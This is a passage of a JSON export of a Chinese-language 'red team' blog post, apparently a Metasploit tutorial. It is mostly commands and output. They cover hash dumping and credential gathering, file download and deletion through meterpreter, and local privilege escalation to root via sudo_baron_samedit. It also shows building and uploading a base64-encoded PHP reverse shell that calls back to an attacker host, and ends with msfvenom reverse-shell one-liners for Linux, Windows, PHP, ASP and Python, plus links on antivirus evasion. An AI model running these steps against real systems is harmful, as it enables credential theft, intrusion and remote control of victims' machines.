run post\/windows\/gather\/enum_logged_on_users #\u5217\u8209\u76ee\u524d\u767b\u9304\u7684\u7528\u6236
run post\/windows\/gather\/enum_applications #\u5217\u8209\u61c9\u7528\u7a0b\u5e8f
run post\/windows\/gather\/credentials\/windows_autologin
run post\/windows\/gather\/smart_hashdump #dump\u51fa\u6240\u6709\u7528\u6236\u7684hash<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u8a2a\u554f\u6587\u4ef6\u7cfb\u7d71<\/h3>\n\n\n\n
\u4f7f\u7528meterpreter\u6642\uff0c\u53ef\u7528\u4ee5\u4e0b\u6307\u4ee4<\/p>\n\n\n\n
meterpreter > pwd #\u67e5\u770b\u76ee\u524d\u76ee\u9304
meterpreter > cd #\u5207\u63db\u76ee\u6a19\u76ee\u9304\uff1b
meterpreter > cat #\u8b80\u53d6\u6587\u4ef6\u5167\u5bb9\uff1b
meterpreter > rm #\u522a\u9664\u6587\u4ef6\uff1b
meterpreter > edit #\u4f7f\u7528vim\u7de8\u8f2f\u6587\u4ef6
meterpreter > ls #\u53d6\u5f97\u76ee\u524d\u76ee\u9304\u4e0b\u7684\u6a94\u6848\uff1b
meterpreter > mkdir #\u65b0\u5efa\u76ee\u9304\uff1b
meterpreter > rmdir #\u522a\u9664\u76ee\u9304\uff1b
meterpreter > download file # \u6307\u4ee4\u53ef\u4ee5\u5e6b\u52a9\u6211\u5011\u5f9e\u76ee\u6a19\u7cfb\u7d71\u4e0b\u8f09\u6587\u4ef6
meterpreter > upload file # \u6307\u4ee4\u5247\u80fd\u5920\u5411\u76ee\u6a19\u7cfb\u7d71\u4e0a\u50b3\u6587\u4ef6<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u4f7f\u7528\u6f0f\u6d1e\u63d0\u6b0a<\/h3>\n\n\n\n
\u5982\u679c\u5df1\u7d93\u5728meterpreter\u5167\uff0c\u53ef\u7528\u4ee5\u4e0b\u65b9\u5f0f\u6aa2\u67e5\u76ee\u6a19\u4e3b\u6a5f\u6709\u90a3\u4e9b\u6f0f\u6d1e\u53ef\u63d0\u6b0a<\/p>\n\n\n\n
meterpreter > run post\/multi\/recon\/local_exploit_suggester \n[*] 192.168.0.111 - Collecting local exploits for x86\/windows...\n[*] 192.168.0.111 - 31 exploit checks are being tried...\n[+] 192.168.0.111 - exploit\/linux\/local\/ptrace_traceme_pkexec_helper: The target appears to be vulnerable.\n[+] 192.168.0.111 - exploit\/linux\/local\/sudo_baron_samedit: The target appears to be vulnerable. sudo 1.8.21.2 is a vulnerable build.\n[*] Post module execution completed<\/code><\/pre>\n\n\n\n\u5982\u679c\u9084\u6c92\u9032\u53bbshell\uff0c\u53ef\u7528\u4ee5\u4e0b\u65b9\u5f0f\u6307\u5b9a\u8981\u6aa2\u67e5\u7684session<\/p>\n\n\n\n
msf > use post\/multi\/recon\/local_exploit_suggester\nmsf post(local_exploit_suggester) > set session 1\nmsf post(local_exploit_suggester) > show options\n\nModule options (post\/multi\/recon\/local_exploit_suggester):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n SESSION 1 yes The session to run this module on.\n SHOWDESCRIPTION false yes Displays a detailed description for the available exploits\n\nmsf post(local_exploit_suggester) > run\n\n[*] 192.168.0.111 - Collecting local exploits for x64\/linux...\n[*] 192.168.0.111 - 31 exploit checks are being tried...\n[+] 192.168.0.111 - exploit\/linux\/local\/sudo_baron_samedit: The target appears to be vulnerable. sudo 1.8.21.2 is a vulnerable build.\n...omit...\n[*] Post module execution completed<\/code><\/pre>\n\n\n\n\u767c\u73fesession 1\u7684\u4e3b\u6a5f\u6709exploit\/linux\/local\/sudo_baron_samedit\u554f\u984c\uff0c\u91dd\u5c0d\u9019\u500b\u6f0f\u6d1e\u63d0\u6b0a<\/p>\n\n\n\n
msf > use exploit\/linux\/local\/sudo_baron_samedit\nmsf exploit(linux\/local\/sudo_baron_samedit) > set session 1\nmsf exploit(linux\/local\/sudo_baron_samedit) > run\n...omit...\nmeterpreter >\nmeterpreter > shell\nwhoami\nroot<\/code><\/pre>\n\n\n\n
\n\n\n\nmsfvenom <\/h2>\n\n\n\n
\u653b\u64ca\u64cd\u4f5c\u6d41\u7a0b\u7c21\u4ecb\u5982\u4e0b<\/p>\n\n\n\n
1.\u6e96\u5099\u76e3\u807d\u4e3b\u6a5f<\/h3>\n\n\n\n
\u5148\u5728msf\u4e2d\u6e96\u5099\u597dphp\u7684\u53cd\u5411shell\u76e3\u807d\u4e3b\u6a5f\uff0c\u4e26\u8a2d\u5b9a\u4e3b\u6a5fIP\u548cport\u70ba172.16.1.100:4321\uff0cmulti\/handler<\/code>\u53ef\u652f\u63f4\u591a\u500b\u53cd\u5411shell\u9023\u56de\u4f86<\/p>\n\n\n\nmsf > use exploit\/multi\/handler\nmsf exploit(multi\/handler) > set payload php\/meterpreter\/reverse_tcp\npayload => php\/meterpreter\/reverse_tcp\nmsf exploit(multi\/handler) > set lhost 172.16.1.100\nlhost => 172.16.1.100\nmsf exploit(multi\/handler) > set lport 4321\nlport => 4321\nmsf exploit(multi\/handler) > run\n[*] Started reverse TCP handler on 172.16.1.100:4321<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
2.\u6e96\u5099reverse shell<\/h3>\n\n\n\n
\u88fd\u4f5c\u4e00\u500bphp\u53cd\u5411shell, \u57f7\u884c\u5f8c\u6703\u9023\u56de172.16.1.100:4321, \u4e26\u4f7f\u7528base64\u7de8\u78bc, \u8f38\u51fa\u683c\u5f0f\u70baf<\/p>\n\n\n\n
root@drd:~# msfvenom -p php\/meterpreter\/reverse_tcp lhost=172.16.1.100 lport=4321 -e php\/base64 -f raw > payload.php\n[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload\n[-] No arch selected, selecting arch: php from the payload\nFound 1 compatible encoders\nAttempting to encode payload with 1 iterations of php\/base64\nphp\/base64 succeeded with size 1507 (iteration=0)\nphp\/base64 chosen with final size 1507\nPayload size: 1507 bytes<\/code><\/pre>\n\n\n\n\u5728payload.php\u5167\u7684\u982d\u548c\u5c3e\u5206\u5225\u52a0\u5165<?php \u548c?><\/p>\n\n\n\n
3.\u5229\u7528\u6f0f\u6d1e\u4e0a\u50b3<\/h3>\n\n\n\n
\u900f\u904e\u6f0f\u6d1e\u4e0a\u50b3payload.php\u4e26\u57f7\u884c\uff0c\u5c31\u6703\u9023\u56de172.16.1.100:4321\uff0c\u800cmsfconsole\u4e5f\u6703\u6536\u7684\u8a0a\u606f<\/p>\n\n\n\n
[*] Sending stage (37775 bytes) to 172.16.1.102\n[*] Meterpreter session 1 opened (172.16.1.100:4321 -> 172.16.1.102:40115) at 2018-10-18 11:29:19 -0500\n\nmeterpreter > getuid\nServer username: www-data (33)\nmeterpreter > sysinfo\nComputer : metasploitable\nOS : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686\nMeterpreter : php\/linux<\/code><\/pre>\n\n\n\n
\n\n\n\n\u88dc\u5145\uff1a\u5e38\u7528\u7684\u53cd\u5411shell\u6307\u4ee4<\/h3>\n\n\n\n
linux msfvenom -p linux\/x86\/meterpreter\/reverse_tcp LHOST=<IP> LPORT=<Port> -f elf > rev_shell.elf<\/code><\/p>\n\n\n\nwindows msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<IP> LPORT=<Port> -f exe > rev_shell.exe<\/code><\/p>\n\n\n\nphp msfvenom -p php\/meterpreter_reverse_tcp LHOST=<IP> LPORT=<Port> -f raw > rev_shell.php<\/code><\/p>\n\n\n\nasp msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<IP> LPORT=<Port> -f asp > rev_shell.asp<\/code><\/p>\n\n\n\npython msfvenom -p cmd\/unix\/reverse_python LHOST=<IP> LPORT=<Port> -f raw > rev_shell.py<\/code><\/p>\n\n\n\n<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\nrefer<\/p>\n\n\n\n
https:\/\/www.offsec.com\/metasploit-unleashed\/windows-post-gather-modules<\/a>
https:\/\/www.rapid7.com\/blog\/post\/2015\/08\/11\/metasploit-local-exploit-suggester-do-less-get-more<\/a>
https:\/\/zhuanlan.zhihu.com\/p\/610772424<\/a>
https:\/\/blog.51cto.com\/jayjaydream\/5947626<\/a>
https:\/\/cn-sec.com\/archives\/1963017.html<\/a> \u751f\u6210\u6728\u99ac\u65b9\u6cd5
https:\/\/www.freebuf.com\/articles\/system\/227461.html<\/a> \u514d\u6bba\u65b9\u6cd5<\/p>\n","protected":false},"excerpt":{"rendered":"Metasploit Framework(MSF)\u662f\u4e00\u6b3e\u958b\u6e90\u5b89\u5168\u6f0f\u6d1e\u76e3\u6e2c\u5de5\u5177\uff0c\u8a72\u5de5\u5177\u5df2\u9644\u5e36\u6578\u5343\u500b\u5df2\u77e5\u7684\u8edf\u9ad4\u6f0f\u6d1e\uff0c\u4e14\u4ecd\u5728\u4fdd\u6301\u66f4\u65b0\u3002 Metaploit\u53ef\u4ee5\u7528\u65bc\u8cc7\u8a0a\u6536\u96c6\u3001\u6f0f\u6d1e\u63a2\u6e2c\u3001\u6f0f\u6d1e\u5229\u7528\u7b49\u6ef2\u900f\u6e2c\u8a66\u7684\u5168\u6d41\u7a0b\uff0c\u9084\u53ef\u4ee5\u7528msfvenom\u7522\u751f\u6728\u99ac\u4e26\u505a\u514d\u6bba<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[369],"tags":[],"class_list":["post-1778","post","type-post","status-publish","format-standard","hentry","category-red-team"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1778","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1778"}],"version-history":[{"count":1,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1778\/revisions"}],"predecessor-version":[{"id":2410,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1778\/revisions\/2410"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1778"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1778"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1778"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}